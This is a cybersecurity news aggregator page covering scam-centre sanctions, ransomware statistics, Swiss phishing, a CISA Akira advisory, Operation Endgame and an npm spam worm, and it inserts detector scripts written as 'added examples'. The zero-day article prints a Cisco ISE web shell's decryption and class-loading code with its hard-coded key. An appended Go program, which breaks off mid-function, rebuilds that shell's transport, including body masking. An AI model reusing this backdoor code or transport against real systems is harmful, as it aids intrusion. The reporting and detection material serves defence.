Cyber security aggregate rss news

Cyber security aggregator - feeds history

US Imposes Sanctions ...

Governance

The US Treasury has sanctioned a Burmese armed group and several related companies for their alleged involvement in cyber scam centers targeting American citizens. The Department of the Treasury's Office of Foreign Assets Control (OFAC) announced the designations as part of a broader effort to combat organized crime, human trafficking, and cybercriminal activity operating out of Southeast Asia.

According to the Treasury Department, OFAC has sanctioned the Democratic Karen Benevolent Army (DKBA), a Burmese armed group, and four of its senior leaders for supporting cyber scam centers in Burma. These operations reportedly defraud Americans through fraudulent investment schemes.

OFAC Targets Armed Group and Associated Firms

The agency also designated Trans Asia International Holding Group Thailand Company Limited, Troth Star Company Limited, and Thai national Chamu Sawang, citing links to Chinese organized crime networks. These entities were found to be working with the DKBA and other armed groups to establish and expand scam compounds in the region.

Under Secretary of the Treasury for Terrorism and Financial Intelligence John K. Hurley stated, "criminal networks operating out of Burma are stealing billions of dollars from hardworking Americans through online scams." He emphasized that such activities not only exploit victims financially but also feed Burma's civil conflict by funding armed organizations.

Scam Center Strike Force Established

In coordination with agencies including the Federal Bureau of Investigation (FBI), U.S. Secret Service (USSS), and Department of Justice, a new Scam Center Strike Force has been launched to counter cyber scams originating from Burma, Cambodia, and Laos. The task force will focus on investigating and disrupting the most harmful Southeast Asian scam centers while supporting U.S. victims through education and restitution programs. The initiative aims to combine law enforcement, financial action, and diplomatic efforts to curb illicit online operations.

(Image: Source: Department of the Treasury's Office of Foreign Assets Control (OFAC))

An Ongoing Effort to Protect Victims

The action builds on previous measures targeting illicit actors in the region. Earlier in 2025, the Karen National Army (KNA) and several related companies were sanctioned for their roles in human trafficking and cyber scam activities. Additional designations in Cambodia and Burma followed, targeting groups such as the Prince Group and Huione Group for operating scam compounds and laundering proceeds from virtual currency investment scams. According to government reports, Americans lost over $10 billion in 2024 to Southeast Asia-based cyber scam operations, a 66 percent increase from the previous year.

Cyber Scams and Human Trafficking Links

Investigations revealed that many individuals working in scam centers are victims of human trafficking, coerced into online fraud through threats and violence. Some compounds, including Tai Chang and KK Park in Burma's Karen State, are known hubs for cyber scams. The DKBA reportedly provides protection for these compounds while also participating in violent acts against trafficked workers.

These scam networks typically use messaging apps and fake investment platforms to deceive Americans. Victims are manipulated into transferring funds to scam-controlled accounts under the guise of legitimate investments.

Sanctions and Legal Implications

Following today's actions, all property and interests in property of the designated individuals and entities within the United States are blocked. The sanctions prohibit any U.S. person from engaging in transactions involving the blocked parties, and violations of OFAC regulations can lead to civil or criminal penalties.

The action underscores the United States' continued commitment to disrupting global cyber scam operations, holding organized crime networks accountable, and safeguarding victims of human trafficking and financial exploitation.

Ransomware Attacks S ...

Cyber News

Ransomware attacks soared 30% in October to the second-highest monthly total on record, Cyble reported today. The 623 ransomware attacks recorded in October were second only to February 2025's record of 854, when a CL0P campaign against managed file transfer (MFT) software drove up the total. October was the sixth consecutive monthly increase in ransomware attacks, Cyble noted in a blog post.

Qilin was once again the most active ransomware group, for the sixth time in the seven months since the decline of RansomHub. Qilin's 210 claimed victims were three times as many as second-place Akira's (chart below). Just behind Akira was Sinobi with 69 victims, a remarkable rise for a group that first emerged in July.

(Chart: Top ransomware groups, October 2025 (Cyble))

Construction, professional services, healthcare, manufacturing, IT and energy/utilities were the most targeted sectors (chart below).

(Chart: Ransomware attacks by industry, October 2025 (Cyble))

Cyble noted that 31 incidents in October may have affected critical infrastructure, and another 26 had possible supply chain implications. The U.S. was once again the most attacked country; its 361 attacks were 10 times second-place Canada's (chart below).

(Chart: Ransomware attacks by country, October 2025 (Cyble))

"Of concern is the emergence of Australia as a top five target, as the country's rich resources and high per-capita GDP have made the country a rich target for threat actors," Cyble noted.

Ransomware attacks are up 50% so far this year, with 5,194 attacks recorded through October 31, Cyble said, "as new leaders like Qilin, Sinobi and The Gentlemen have more than made up for the decline of former leaders such as LockBit and RansomHub."

Vulnerabilities Exploited by Ransomware Groups

Critical IT vulnerabilities and unpatched internet-facing assets have fueled a rise in both ransomware and supply chain attacks this year, Cyble said. Vulnerabilities targeted in October included:

- CVE-2025-61882 in Oracle E-Business Suite, targeted by Cl0p
- CVE-2025-10035 in GoAnywhere MFT, exploited by Medusa
- CVE-2021-43226, a Microsoft Windows privilege escalation vulnerability, exploited by unknown ransomware groups according to a CISA advisory
- CVE-2025-6264 in Velociraptor, targeted by Warlock ransomware operators
- CVE-2024-1086 in the Linux kernel's netfilter nf_tables module, exploited by unknown ransomware groups according to a CISA advisory

Ransomware Attacks and Key Developments

Below are some of the most important ransomware developments in October, according to Cyble.

- Ransomware operators are "increasingly hijacking or silently installing legitimate remote access tools" such as AnyDesk, RustDesk, Splashtop, and TightVNC after credential compromise, using them for persistent access, control, antivirus neutralization and ransomware delivery.
- Recent BlackSuit campaigns used vishing to steal VPN credentials for initial access and DCSync against a domain controller for high-privilege access, with AnyDesk and a custom RAT for persistence. "Other measures included wiping forensic traces with CCleaner, and using Ansible to deploy BlackSuit ransomware across ESXi hosts, encrypting hundreds of VMs and causing major operational disruption," Cyble said.
- Qilin affiliates deployed a Linux-based ransomware binary on Windows machines by abusing tools such as WinSCP, Splashtop, AnyDesk, and ScreenConnect and by leveraging BYOVD (Bring Your Own Vulnerable Driver) attacks, among other tools and tactics.
- Trigona ransomware operators brute-forced exposed MS-SQL servers, embedded malware inside database tables and exported it to disk to install payloads.
- DragonForce posted on the RAMP cybercrime forum that it is opening its partner program to the public, offering services such as professional file analysis/audit, hash decryption, call support, and free victim storage. Registration requires a $500 non-refundable fee. Affiliates were warned to follow the group's rules "or face account blocking or free decryptor distribution."
- Zeta88, the alleged operator of The Gentlemen ransomware, announced updates to the group's Windows, Linux and ESXi lockers, including a silent mode for Windows that encrypts without renaming files and preserves timestamps, and self-spreading across networks and domains. The release also introduced multiple encryption-speed modes, Windows operating modes, and a universal decryptor.

The full Cyble blog also included recommended best practices and recent high-confidence Qilin indicators of compromise (IoCs).

Phishing Attacks in ...

Cyber News

Phishing attacks are becoming increasingly targeted as scammers refine their tactics to exploit social and economic issues. Instead of mass-mailing identical messages, cybercriminals now build tailored campaigns that look legitimate to specific audiences. Switzerland's National Cyber Security Centre (NCSC) has warned that these phishing attacks are becoming more sophisticated, often imitating trusted institutions such as government agencies, banks, or health insurers. By borrowing familiar branding and credible topics such as cryptocurrency or tax rule changes, scammers are deceiving individuals into handing over personal information.

Phishing Emails Impersonate the Canton of Zurich

In one of the latest reported incidents, recipients received emails that appeared to originate from the Canton of Zurich, urging them to update their information to comply with new cryptocurrency tax regulations. The email carried the official logo and layout, set a short compliance deadline, and threatened fines or legal action if ignored.

(Image: Source: NCSC)

Victims were directed to a fake website that closely mirrored the legitimate Canton of Zurich portal. After entering personal details such as their address, IBAN, date of birth, and telephone number, users were shown a confirmation page and then redirected to the real website, reinforcing the illusion of authenticity.

(Image: Source: NCSC)

(Image: Source: NCSC)

Although the stolen data might not seem highly sensitive, authorities warn that it can be misused in follow-up scams. For instance, fraudsters may later call victims pretending to be bank representatives, using the collected personal details to sound credible and gain further access.

Emails Targeting Senior Citizens

A second phishing attack reported by the NCSC impersonated the Federal Tax Administration and focused on senior citizens. These emails referenced pension fund benefits, promised payouts, and asked recipients to update their information. The messages used personalized greetings and professional formatting to build trust. While it is unclear whether the emails were sent exclusively to older individuals, the targeted tone suggests an attempt to exploit a more vulnerable demographic.

(Image: Source: NCSC)

Such campaigns highlight the shift from random spam to targeted phishing, in which scammers invest more effort in psychological manipulation and social engineering.

Recommendations from the NCSC

Authorities are advising citizens to remain alert and follow these steps to reduce the risk of falling victim to phishing attacks:

- Be cautious of any email requesting personal or financial details.
- Never click on links or fill out forms from unsolicited messages.
- Verify the sender's address and look for missing salutations or unofficial URLs.
- When uncertain, contact the official organization directly for clarification.
- Report suspicious links to antiphishing.ch.
- If financial information has been disclosed, contact your bank or card issuer immediately.
- In case of monetary loss, report the incident to the police via the Suisse ePolice platform.

Proactive Measures Against Phishing Attacks

The evolution of phishing attacks in Switzerland shows how cybercriminals continuously adapt their methods to exploit trust and uncertainty. While public awareness campaigns remain vital, organizations must also invest in threat intelligence that detects fraudulent domains, fake websites, and malicious email infrastructure before they reach potential victims. Platforms like Cyble provide visibility into phishing campaigns and threat actor activity across the dark web and surface web, enabling businesses to take timely action and protect their customers and employees. Learn more about how intelligence-led defense can safeguard your organization from phishing and social engineering threats: Request a demo from Cyble.

Akira Ransomware Gro ...

Cyber News

The Akira ransomware group poses an "imminent threat to critical infrastructure," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned today. CISA joined the FBI, other U.S. agencies and international counterparts to issue a lengthy updated advisory on the group, adding many new Akira tactics, techniques and procedures (TTPs), indicators of compromise (IoCs), and vulnerabilities exploited by the group.

Akira is consistently one of the most active ransomware groups, so the update from CISA and its partners is significant. As of late September, Akira had netted about $244.17 million in ransom payments, CISA said. The information on the group was sourced from "FBI investigations and trusted third-party reporting," the agency said.

In a busy two days for the agency, CISA also added three vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog:

- CVE-2025-9242, a WatchGuard Firebox out-of-bounds write vulnerability
- CVE-2025-12480, a Gladinet Triofox improper access control vulnerability
- CVE-2025-62215, a Microsoft Windows race condition vulnerability

It also reissued orders to federal agencies to patch Cisco vulnerabilities CVE-2025-20333 and CVE-2025-20362.

Akira Ransomware Group Targets Vulnerabilities for Initial Access

The CISA Akira advisory notes that in a June 2025 incident, Akira encrypted Nutanix Acropolis Hypervisor (AHV) virtual machine (VM) disk files for the first time, expanding the group's reach beyond VMware ESXi and Hyper-V, after gaining access by abusing CVE-2024-40766, a SonicWall vulnerability.

The updated advisory adds six new vulnerabilities exploited by Akira threat actors for initial access:

- CVE-2020-3580, a cross-site scripting (XSS) vulnerability in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD)
- CVE-2023-28252, a Windows Common Log File System Driver elevation of privilege vulnerability
- CVE-2024-37085, a VMware ESXi authentication bypass vulnerability
- CVE-2023-27532, a Veeam missing authentication for critical function vulnerability
- CVE-2024-40711, a Veeam deserialization of untrusted data vulnerability
- CVE-2024-40766, a SonicWall improper access control vulnerability

"Akira threat actors gain access to VPN products, such as SonicWall, by stealing login credentials or exploiting vulnerabilities like CVE-2024-40766," the CISA advisory said. In some cases they gain initial access with compromised VPN credentials, possibly obtained from initial access brokers or by brute-forcing VPN endpoints. The group also uses password spraying and tools such as SharpDomainSpray to obtain account credentials.

Akira threat actors have also gained initial access over Secure Shell (SSH) by targeting a router's exposed IP address. "After tunneling through a targeted router, Akira threat actors exploit publicly available vulnerabilities, such as those found in the Veeam Backup and Replication component of unpatched Veeam backup servers," the advisory said.

Akira's Latest Discovery, Persistence and Evasion Tactics

Visual Basic (VB) scripts are frequently used by the group to execute malicious commands, and nltest /dclist: and nltest /DOMAIN_TRUSTS are used for network and domain discovery. Akira threat actors abuse remote access tools such as AnyDesk and LogMeIn for persistence and to "blend in with administrator activity," and Impacket's wmiexec.py is used to execute remote commands and obtain an interactive shell. Akira threat actors also uninstall endpoint detection and response (EDR) agents to evade detection.

In one incident, Akira threat actors bypassed Virtual Machine Disk (VMDK) file protection by powering down the domain controller's VM and copying its VMDK files to a newly created VM, CISA said. "This sequence of actions enabled them to extract the NTDS.dit file and the SYSTEM hive, ultimately compromising a highly privileged domain administrator's account," the advisory said.

Veeam.Backup.MountService.exe has also been used for privilege escalation (CVE-2024-40711), and AnyDesk, LogMeIn, RDP, SSH and MobaXterm have been used for lateral movement. Akira actors have used tunneling utilities such as Ngrok for command and control (C2) communications, initiating encrypted sessions that bypass perimeter monitoring. PowerShell and the Windows Management Instrumentation Command-line (WMIC) have also been used to disable services and execute malicious scripts. Akira threat actors have exfiltrated data in just over two hours from initial access, CISA said.

The new Akira_v2 variant appends encrypted files with an .akira or .powerranges extension, or with .akiranew or .aki. A ransom note named fn.txt or akira_readme.txt is dropped in both the root directory (C:\) and each user's home directory (C:\Users).

CISA recommended a number of security best practices for combating the Akira ransomware threat, including prioritizing remediation of known exploited vulnerabilities, enforcing phishing-resistant multifactor authentication (MFA), and maintaining regular, tested offline backups of critical data.
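As an added example, not code from the CISA advisory or from Cyble, the following Python script matches a few of the indicators quoted above (the nltest discovery commands, wmiexec.py, the Akira_v2 file extensions and the ransom note names) against constructed process-creation and file-creation events. The event format ("TYPE key=value ..."), the hostnames and the paths are hypothetical; a real deployment would read Sysmon or EDR telemetry instead. It also flags a host that writes several files with an Akira extension as a likely mass-encryption event, which the extension hits alone do not express.

```python
"""Added example: match Akira indicators named in the advisory summary against
constructed endpoint events. Event format, hosts and paths are hypothetical."""
import re
from collections import defaultdict

# Discovery/execution commands attributed to Akira in the advisory text.
DISCOVERY_PATTERNS = {
    "nltest_dclist": re.compile(r"\bnltest(?:\.exe)?\s+/dclist:", re.I),
    "nltest_domain_trusts": re.compile(r"\bnltest(?:\.exe)?\s+/domain_trusts\b", re.I),
    "impacket_wmiexec": re.compile(r"\bwmiexec\.py\b", re.I),
}
# Akira_v2 encrypted-file extensions and ransom note file names.
RANSOM_EXTENSIONS = (".akira", ".powerranges", ".akiranew", ".aki")
RANSOM_NOTE_NAMES = {"fn.txt", "akira_readme.txt"}

# Hypothetical telemetry: 'PROC' = process creation, 'FILE' = file creation.
_KV = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_event(line):
    """Parse 'TYPE key=value key="quoted value"' into a dict (hypothetical format)."""
    kind, _, rest = line.strip().partition(" ")
    fields = {"type": kind}
    for key, val in _KV.findall(rest):
        if len(val) >= 2 and val[0] == val[-1] == '"':
            val = val[1:-1]
        fields[key] = val
    return fields


def classify(event):
    """Return the indicator names one event matches (empty list if benign)."""
    hits = []
    if event["type"] == "PROC":
        cmd = event.get("cmdline", "")
        hits.extend(n for n, p in DISCOVERY_PATTERNS.items() if p.search(cmd))
    elif event["type"] == "FILE":
        name = event.get("path", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
        if name in RANSOM_NOTE_NAMES:
            hits.append("ransom_note")
        elif name.endswith(RANSOM_EXTENSIONS):
            hits.append("encrypted_file_extension")
    return hits


def scan(lines, encryption_threshold=3):
    """Group indicator hits per host; add 'mass_encryption' when a host writes
    at least `encryption_threshold` files with an Akira extension."""
    per_host = defaultdict(set)
    encrypted = defaultdict(int)
    for line in lines:
        if not line.strip():
            continue
        event = parse_event(line)
        host = event.get("host", "unknown")
        for hit in classify(event):
            per_host[host].add(hit)
            if hit == "encrypted_file_extension":
                encrypted[host] += 1
    for host, count in encrypted.items():
        if count >= encryption_threshold:
            per_host[host].add("mass_encryption")
    return {host: sorted(hits) for host, hits in per_host.items()}


# Constructed sample telemetry (not real logs). Backslashes are doubled for Python.
SAMPLE_EVENTS = """\
PROC host=ws01 user=alice image=C:\\Windows\\System32\\nltest.exe cmdline="nltest /dclist:corp.local"
PROC host=ws01 user=alice image=C:\\Windows\\System32\\nltest.exe cmdline="nltest /DOMAIN_TRUSTS"
PROC host=jump01 user=svc image=/usr/bin/python3 cmdline="python3 wmiexec.py corp/admin@10.0.0.5"
FILE host=fs01 path="C:\\Shares\\finance\\q3.xlsx.akira"
FILE host=fs01 path="C:\\Shares\\finance\\q3.docx.powerranges"
FILE host=fs01 path="C:\\Shares\\hr\\list.csv.akiranew"
FILE host=fs01 path="C:\\akira_readme.txt"
FILE host=ws02 path="C:\\Users\\bob\\notes.txt"
PROC host=ws02 user=bob image=C:\\Windows\\System32\\nltest.exe cmdline="nltest /server:dc01 /sc_query:corp.local"
"""

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS.splitlines()).items():
        print(f"{host}: {', '.join(hits)}")
```

The last sample line shows a benign nltest invocation that the patterns deliberately do not match; tuning the threshold and adding the remote-access tool binaries your estate does not use would be the next step.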

Operation Endgame Di ...

Threat Actors

The warning arrived on chat at 3:47 AM: "Immediately reinstall your server, erase traces, the German police are acting." Cybercriminals worldwide using the Rhadamanthys infostealer watched in real time as German law enforcement IP addresses appeared in their web panels, signaling the collapse of what investigators now describe as one of the largest credential theft operations globally.

Between November 10 and 14, 2025, authorities coordinated from Europol's headquarters in The Hague dismantled 1,025 servers supporting the Rhadamanthys infostealer, the VenomRAT remote access trojan, and the Elysium botnet in the latest phase of Operation Endgame. The infrastructure controlled hundreds of thousands of infected computers holding several million stolen credentials and access to over 100,000 cryptocurrency wallets potentially worth millions of euros. The coordinated international action involved law enforcement from eleven countries, including the United States, Canada, Australia, and multiple European nations.

Key Suspect Arrested in Greece

Authorities arrested a primary suspect linked to VenomRAT operations in Greece on November 3, 2025. The arrest preceded the broader infrastructure takedown by days, suggesting investigators conducted extensive surveillance before executing simultaneous strikes. Officers searched 11 locations across Germany, Greece, and the Netherlands and seized 20 domains tied to the malware operations.

The Rhadamanthys developer acknowledged the disruption in a Telegram message, claiming German law enforcement had accessed their infrastructure. Web panels hosted in EU data centers logged German IP addresses connecting immediately before cybercriminals lost server access, according to messages circulated among the infostealer's customer base.

Security researchers known as g0njxa and Gi7w0rm, who monitor malware operations, reported that Rhadamanthys customers received urgent warnings about the law enforcement action. Internal communications advised immediate cessation of activity and reinstallation of systems to erase traces, with operators noting that SSH access to their servers suddenly required certificates instead of root passwords. The panic spread rapidly through underground forums as customers realized law enforcement had penetrated their command-and-control infrastructure.

Malware-as-a-Service Business Model Disrupted

Rhadamanthys operates on a subscription model in which cybercriminals pay monthly fees for the malware, support, and the web panels used to collect stolen data. The operation marketed itself professionally as "Mythical Origin Labs" through a Tor website with detailed product descriptions, a Telegram support channel, and communication via Tox messaging.

Also read: Be Wary of Google Ads: Rhadamanthys Stealer is Here!

The infostealer harvests login credentials, browser data, cryptocurrency wallet information, autofill data, and other sensitive information from browsers, password managers, and crypto wallets. Subscription plans spanned multiple tiers with different levels of functionality and support. The malware commonly spreads through campaigns promoted as software cracks, malicious YouTube videos, or poisoned search advertisements. Most victims remained unaware of infections on their systems, with stolen credentials silently exfiltrated to attacker-controlled infrastructure.

VenomRAT is a remote access trojan capable of exfiltrating files and stealing cryptocurrency wallets, browser data, credit card details, account passwords, and authentication cookies. Both malware families operated as enablers for the broader cybercrime ecosystem, with customers using stolen data for identity theft, financial fraud, and follow-on attacks.

Elysium Botnet Infrastructure Eliminated

The Elysium botnet, marketed alongside Rhadamanthys by the same operators as a proxy bot service, also fell within the operation's scope. Security researchers assess that machines infected with Rhadamanthys or VenomRAT may also have been equipped with the proxy bot, creating a multi-layered criminal infrastructure serving various malicious purposes. The dismantled infrastructure spanned hundreds of thousands of infected computers across multiple continents. Many victims unknowingly participated in proxy networks that criminals used to route malicious traffic and obscure attack origins.

The Operation Endgame website was updated with new video content mocking Rhadamanthys operators and encouraging their customers to contact law enforcement. The site has previously featured countdown timers announcing upcoming actions, creating psychological pressure on cybercriminals.

About Operation Endgame

Operation Endgame launched with initial actions in May 2024, described by Europol as the largest ever operation against botnets that play major roles in ransomware deployment. Previous phases disrupted the IcedID, Bumblebee, Pikabot, Trickbot, SystemBC, SmokeLoader, and DanaBot malware operations.

Read: Operation Endgame – Largest Ever Operation Against Multiple Botnets Used to Deliver Ransomware

The May 2024 actions resulted in four arrests, over 100 servers taken down across 10 countries, over 2,000 domains brought under law enforcement control, and the seizure of €3.5 million in various cryptocurrencies.

Shadowserver published a Rhadamanthys Historical Bot Infections Special Report covering devices infected between March 14 and October 11, 2025. The report was shared with 201 national CSIRTs in 175 countries and more than 10,000 network owners to identify compromised computers and alert their owners. Authorities also set up resources for concerned victims.

Security researchers warn that despite Operation Endgame's successes, some malware operations have proved resilient. The DanaBot banking trojan resurfaced with version 669 approximately six months after its disruption, now focused on cryptocurrency theft, demonstrating the persistence of cybercrime infrastructure.

The simultaneous dismantling of three interconnected criminal platforms disrupts infrastructure enabling some of the most damaging cybercrimes globally, though investigators acknowledge the ongoing challenge of preventing criminal groups from rebuilding their operations.

Also read: Operation Endgame 2.0: Europe's Cyber Dragnet Just Crippled the Ransomware Economy at Its Source

Large-Scale Spam Cam ...

Firewall Daily

Security researchers have uncovered a large-scale spam campaign within the npm ecosystem, now known as the IndonesianFoods worm. The campaign involves over 43,000 spam packages published across at least 11 user accounts over the past two years. Rather than attempting to steal credentials or data, this worm focuses on polluting the npm registry with junk packages, a flood that nearly doubles the known number of malicious npm packages in existence.

The campaign began more than two years ago and has continued systematically, flooding the registry with dormant payloads disguised as legitimate projects. Paul McCarty's investigation revealed that the worm had been quietly operating across multiple accounts, making it harder for detection systems to recognize the scale of the operation.

The Naming Scheme Behind the "IndonesianFoods Worm"

The IndonesianFoods worm takes its name from its distinctive naming scheme and the dictionaries embedded in its code. The script uses two lists, one of Indonesian personal names such as andi, budi, cindy, and zul, and another of Indonesian food terms such as rendang, sate, bakso, and tapai.

When executed, the script randomly selects one name and one food term, adds a random number between 1 and 100, and appends a suffix such as "-kyuki" or "-breki". Examples of generated package names include "andi-rendang23-breki" and "zul-tapai9-kyuki". This combination of names and foods gives the worm both its recognizable signature and its connection to Indonesia.

McCarty stated that the attack "focuses on creating new packages rather than stealing credentials or engaging in other immediately malicious behavior." Instead, it exploits npm's open publishing model to overwhelm the registry with automated spam, disrupting developers and polluting search results.

Accounts and Behavior of the Spam Campaign

The IndonesianFoods worm has been traced to at least 11 npm accounts, including voinza, yunina, noirdnv, veyla, vndra, vayza, doaortu, jarwok, bipyruss, sernaam.b.y, and rudiox. Each of these accounts was created specifically for this operation, and together they are responsible for publishing thousands of packages. None of them appears to be a compromised account belonging to a legitimate user.

Once the malicious script runs, typically from a file such as auto.js, it modifies package.json, assigns random version numbers, and publishes new packages continuously with the npm publish command. This happens in an infinite loop, creating a new spam package roughly every seven seconds. The result is an ongoing flood of junk data that strains npm's infrastructure and risks contaminating legitimate dependency chains if developers accidentally install one of the packages.

Though the payload does not directly steal data or credentials, it turns the npm registry itself into an attack vector, weaponizing its openness to spread an enormous volume of fake packages.

Conclusion

The IndonesianFoods worm shows how modern spam campaigns in software supply chains rely on automation and persistence to evade detection. Over two years, attackers, possibly based in Indonesia, published tens of thousands of spam npm packages, undermining trust in open ecosystems.

With threats growing more coordinated, Cyble's AI-native threat intelligence platform helps organizations detect, predict, and neutralize new cyber risks. Book a free demo to uncover vulnerabilities and strengthen your defense against large-scale attacks like the IndonesianFoods worm.
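As an added example, not code from McCarty's write-up or from the worm itself, this Python script recognizes the naming scheme described above and checks a package.json for dependencies that follow it. The sample manifest is constructed. The name and food lists contain only the examples quoted in the article, not the worm's full dictionaries, so a match on both lists is reported as "strict" and a match on the structure alone (any lowercase words, a number from 1 to 100, one of the two suffixes) as "loose".

```python
"""Added example: flag npm dependency names that follow the IndonesianFoods
pattern <name>-<food><1..100>-<kyuki|breki>. Word lists are the few examples
quoted in the article, not the worm's full dictionaries."""
import json
import re

KNOWN_NAMES = {"andi", "budi", "cindy", "zul"}
KNOWN_FOODS = {"rendang", "sate", "bakso", "tapai"}

# Number must be 1..100; suffixes are the two seen in the article.
NAME_PATTERN = re.compile(
    r"^(?P<person>[a-z]+)-(?P<food>[a-z]+)(?P<num>100|[1-9][0-9]?)-(?P<suffix>kyuki|breki)$"
)


def classify_name(package_name):
    """'strict' if the structure matches and both words are in the known lists,
    'loose' if only the structure matches, None otherwise."""
    m = NAME_PATTERN.match(package_name)
    if not m:
        return None
    if m["person"] in KNOWN_NAMES and m["food"] in KNOWN_FOODS:
        return "strict"
    return "loose"


def scan_package_json(text):
    """Return {dependency: verdict} for every suspicious dependency in a
    package.json document given as a string."""
    manifest = json.loads(text)
    flagged = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for dep in manifest.get(section, {}):
            verdict = classify_name(dep)
            if verdict:
                flagged[dep] = verdict
    return flagged


# Constructed manifest (not a real project); mixes legitimate and pattern-matching names.
SAMPLE_PACKAGE_JSON = """{
  "name": "example-app",
  "dependencies": {
    "express": "^4.19.2",
    "andi-rendang23-breki": "1.4.2",
    "zul-tapai9-kyuki": "0.9.1",
    "rani-gudeg100-kyuki": "2.0.0",
    "lodash": "^4.17.21",
    "budi-sate-breki": "1.0.0"
  },
  "devDependencies": {
    "jest": "^29.7.0",
    "cindy-bakso7-breki": "3.1.0"
  }
}"""

if __name__ == "__main__":
    for dep, verdict in scan_package_json(SAMPLE_PACKAGE_JSON).items():
        print(f"{verdict:6s} {dep}")
```

"budi-sate-breki" is left alone because it has no number, which shows the check is on the full structure rather than on the suffix alone; extending KNOWN_NAMES and KNOWN_FOODS from the worm's actual dictionaries would turn most "loose" hits into "strict" ones.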

Zero-Day Vulnerabili ...

Firewall Daily

Amazon’s threat intelligence division has revealed a cyber-espionage campaign involving an advanced persistent threat (APT) group exploiting previously undisclosed zero-day vulnerabilities in systems from Cisco and Citrix. The investigation showed that the attackers specifically targeted critical identity and   show more ...

network access control infrastructure; components of enterprises rely on managing authentication and enforcing security policies across their networks.  The initial discovery came from Amazon’s MadPot honeypot service, which detected exploitation attempts of the Citrix “Bleed Two” vulnerability, now tracked as CVE-2025-5777, before it had been made public. This early detection confirmed that the APT had been using the flaw as a zero-day vulnerability.  Further analysis linked the same threat actor to another zero-day vulnerability within Cisco Identity Service Engine (ISE). Amazon shared details of a suspicious payload with Cisco, which led to the identification of a flaw in the deserialization logic of an undocumented Cisco ISE endpoint.   The vulnerability, now designated CVE-2025-20337, allowed pre-authentication remote code execution, granting attackers administrator-level access to affected systems. What raised additional alarm was that this exploitation occurred before Cisco had assigned a CVE number or released patches. Deployment of a Custom Web Shell  Following the successful compromise of targeted systems, the threat actor deployed a custom-built web shell disguised as a legitimate Cisco ISE component called IdentityAuditAction. Unlike typical off-the-shelf malware, this backdoor was tailored specifically for Cisco ISE environments.  Amazon’s investigation revealed that the web shell operated entirely in-memory, leaving minimal traces for forensic analysis. It used Java reflection to inject itself into active threads, registered as an HTTP listener on the Tomcat server to intercept all HTTP requests, and encrypted its communication with DES encryption using non-standard Base64 encoding. Accessing the shell required knowledge of specific HTTP headers, further obscuring its presence.  
The following snippet from the deserialization routine demonstrates the actor’s authentication mechanism for accessing the backdoor:  if (matcher.find()) {    requestBody = matcher.group(1).replace("*", "a").replace("$", "l");    Cipher encodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");    decodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");    byte[] key = "d384922c".getBytes();    encodeCipher.init(1, new SecretKeySpec(key, "DES"));    decodeCipher.init(2, new SecretKeySpec(key, "DES"));    byte[] data = Base64.getDecoder().decode(requestBody);    data = decodeCipher.doFinal(data);    ByteArrayOutputStream arrOut = new ByteArrayOutputStream();    if (proxyClass == null) {        proxyClass = this.defineClass(data);    } else {        Object f = proxyClass.newInstance();        f.equals(arrOut);        f.equals(request);        f.equals(data);        f.toString();    } }   Defensive Measures for CVE-2025-20337 and CVE-2025-5777  The simultaneous exploitation of CVE-2025-20337 and CVE-2025-5777 demonstrates the growing trend of APTs focusing on identity and access control infrastructure as high-value targets. According to Amazon, the attacks were indiscriminate and internet-facing, meaning any unpatched or exposed systems were at risk during the campaign.  The “patch-gap” exploitation, attacking systems in the window before vendors can issue fixes, highlights a persistent challenge in enterprise cybersecurity. Such tactics are commonly used by well-funded threat groups that possess advanced research capabilities or access to undisclosed vulnerability data.  Amazon emphasized that even well-maintained systems can fall victim to pre-authentication zero-days, denoting the need for defense-in-depth strategies. Security teams are advised to:  Restrict access to privileged security appliance endpoints like Cisco ISE and Citrix management portals through network segmentation and firewalls.  
Closely monitor for anomalous activity: unexpected HTTP listeners or classes loaded into the ISE Tomcat JVM, requests to undocumented ISE endpoints, and POST bodies that look like Base64 but contain characters such as * or $ that are not part of the standard alphabet.

Stay current with vendor advisories and threat intelligence feeds regarding emerging zero-day vulnerabilities.

Minimize public internet exposure of critical identity and network control systems, routing administrative access through VPNs or isolated management interfaces.

Conclusion

Amazon's findings show how today's threat actors target identity and access systems as key entry points. By exploiting CVE-2025-5777 in Citrix NetScaler and CVE-2025-20337 in Cisco ISE, the actor demonstrated both precision and intent.

Cyble helps enterprises stay ahead of such threats with its Vulnerability Management platform. By monitoring emerging zero-days, prioritizing patches by risk, and offering insight into active exploitation, Cyble enables security teams to act before attackers do. Schedule a demo to see how its AI-driven intelligence can strengthen your defense against modern cyber threats.
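The decoding path of the web shell excerpt above, reproduced in Go as an added example: this is not Amazon's or Cyble's code, and the actor's client side is not on the page. It assumes the framing regex has already isolated the request body and that the client masks 'a' as '*' and 'l' as '$' when it builds the wire form (the shell's decoder accepts either). It gives an incident responder two things the excerpt alone does not: a decoder for captured bodies, and a check that a body decrypts under the hard-coded key to a Java class file, which is what the first request to the shell has to carry.

```go
// Added example, not code from Amazon's or Cyble's write-up: reproduce the
// transport used by the web shell excerpt so a captured request body can be
// checked offline. Assumptions (not on the page): the framing regex has
// already isolated the body, and the client masks 'a' as '*' and 'l' as '$'
// when it builds the wire form; the shell's own decoder accepts either form.
package main

import (
	"bytes"
	"crypto/des"
	"encoding/base64"
	"errors"
	"fmt"
	"strings"
)

// Hard-coded 8-byte key taken from the excerpt.
var shellKey = []byte("d384922c")

// Every Java class file starts with this magic number; the shell's first
// request feeds the decrypted bytes to defineClass(), so a genuine first-stage
// body must decrypt to something with this prefix.
var classMagic = []byte{0xCA, 0xFE, 0xBA, 0xBE}

// unmask reverses the substitution the shell applies before Base64-decoding.
func unmask(body string) string {
	return strings.NewReplacer("*", "a", "$", "l").Replace(body)
}

// mask produces the wire form the way the assumed client does: every 'a' and
// 'l' is replaced, so the body is no longer valid standard Base64.
func mask(b64 string) string {
	return strings.NewReplacer("a", "*", "l", "$").Replace(b64)
}

func pkcs5Pad(data []byte, blockSize int) []byte {
	n := blockSize - len(data)%blockSize
	return append(append([]byte{}, data...), bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs5Unpad(data []byte, blockSize int) ([]byte, error) {
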